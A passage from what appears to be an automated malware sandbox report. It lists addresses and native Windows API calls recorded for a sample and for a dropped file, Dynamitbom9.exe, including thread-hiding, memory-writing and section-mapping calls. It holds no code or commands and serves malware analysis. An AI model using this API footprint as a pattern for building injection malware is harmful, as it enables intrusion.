    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567F37 NtSetInformationThread,10_2_00567F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567FE1 NtSetInformationThread,10_2_00567FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A750 NtCreateFile,LdrInitializeThunk,12_2_1F47A750
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A700 NtProtectVirtualMemory,LdrInitializeThunk,12_2_1F47A700
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A720 NtResumeThread,LdrInitializeThunk,12_2_1F47A720
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A610 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_1F47A610
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A6A0 NtCreateSection,LdrInitializeThunk,12_2_1F47A6A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A540 NtDelayExecution,LdrInitializeThunk,12_2_1F47A540
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A560 NtQuerySystemInformation,LdrInitializeThunk,12_2_1F47A560
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A5F0 NtReadVirtualMemory,LdrInitializeThunk,12_2_1F47A5F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A410 NtQueryInformationToken,LdrInitializeThunk,12_2_1F47A410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A480 NtMapViewOfSection,LdrInitializeThunk,12_2_1F47A480
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A4A0 NtUnmapViewOfSection,LdrInitializeThunk,12_2_1F47A4A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A360 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_1F47A360
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A3E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_1F47A3E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A240 NtReadFile,LdrInitializeThunk,12_2_1F47A240
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A2D0 NtClose,LdrInitializeThunk,12_2_1F47A2D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A710 NtQuerySection,12_2_1F47A710
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A780 NtOpenDirectoryObject,12_2_1F47A780
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A650 NtQueueApcThread,12_2_1F47A650
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A6D0 NtCreateProcessEx,12_2_1F47A6D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47BD40 NtSuspendThread,12_2_1F47BD40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A520 NtEnumerateKey,12_2_1F47A520
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A5A0 NtWriteVirtualMemory,12_2_1F47A5A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A460 NtOpenProcess,12_2_1F47A460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47B470 NtOpenThread,12_2_1F47B470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A470 NtSetInformationFile,12_2_1F47A470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47B410 NtOpenProcessToken,12_2_1F47B410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A430 NtQueryVirtualMemory,12_2_1F47A430
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47ACE0 NtCreateMutant,12_2_1F47ACE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A350 NtQueryValueKey,12_2_1F47A350
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A370 NtQueryInformationProcess,12_2_1F47A370
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A310 NtEnumerateValueKey,12_2_1F47A310
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A3D0 NtCreateKey,12_2_1F47A3D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A260 NtWriteFile,12_2_1F47A260
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A220 NtWaitForSingleObject,12_2_1F47A220
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47BA30 NtSetContextThread,12_2_1F47BA30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A2F0 NtQueryInformationFile,12_2_1F47A2F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A800 NtSetValueKey,12_2_1F47A800
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47B0B0 NtGetContextThread,12_2_1F47B0B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567829 NtProtectVirtualMemory,12_2_00567829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567C0A NtSetInformationThread,12_2_00567C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_0056083D NtSetInformationThread,12_2_0056083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_005680A5 NtSetInformationThread,12_2_005680A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_005681E5 NtSetInformationThread,12_2_005681E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_005682D5 NtSetInformationThread,12_2_005682D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00560ADD NtProtectVirtualMemory,12_2_00560ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567C17 NtSetInformationThread,12_2_00567C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567CC3 NtSetInformationThread,12_2_00567CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567DFF NtSetInformationThread,12_2_00567DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567E9B NtSetInformationThread,12_2_00567E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_0056076D NtSetInformationThread,12_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567F37 NtSetInformationThread,12_2_00567F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567FE1 NtSetInformationThread,12_2_00567FE1
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_00401D570_2_00401D57
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_0040159C0_2_0040159C
    Source: C:\Users\user\Desktop\sample.exeCode function: 0_2_004016780_2_00401678
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5117466_2_1F511746
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F511FCE6_2_1F511FCE
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5027826_2_1F502782
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4657906_2_1F465790
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4676406_2_1F467640
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F474E616_2_1F474E61
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F50CE666_2_1F50CE66
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F475E706_2_1F475E70
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4766116_2_1F476611
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5126F86_2_1F5126F8
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F503E966_2_1F503E96
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F440D406_2_1F440D40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5125196_2_1F512519
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F501D1B6_2_1F501D1B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4EC53F6_2_1F4EC53F
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4615306_2_1F461530
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F50D5D26_2_1F50D5D2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4FFDDB6_2_1F4FFDDB
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4F1DE36_2_1F4F1DE3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4EE58A6_2_1F4EE58A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F50E5816_2_1F50E581
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F47547E6_2_1F47547E
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F45740C6_2_1F45740C
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4614106_2_1F461410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4FF42B6_2_1F4FF42B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F50DCC56_2_1F50DCC5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5044EF6_2_1F5044EF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5034906_2_1F503490
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F512C9A6_2_1F512C9A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F511C9F6_2_1F511C9F
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F46FB406_2_1F46FB40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4763C26_2_1F4763C2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F44EBE06_2_1F44EBE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F474B966_2_1F474B96
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F474A5B6_2_1F474A5B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F51E2146_2_1F51E214
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F500A026_2_1F500A02
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F47523D6_2_1F47523D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5122DD6_2_1F5122DD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F511A996_2_1F511A99
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4642B06_2_1F4642B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F47594B6_2_1F47594B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4999066_2_1F499906
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F4771106_2_1F477110
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5061DF6_2_1F5061DF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F5119E26_2_1F5119E2
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 6_2_1F476180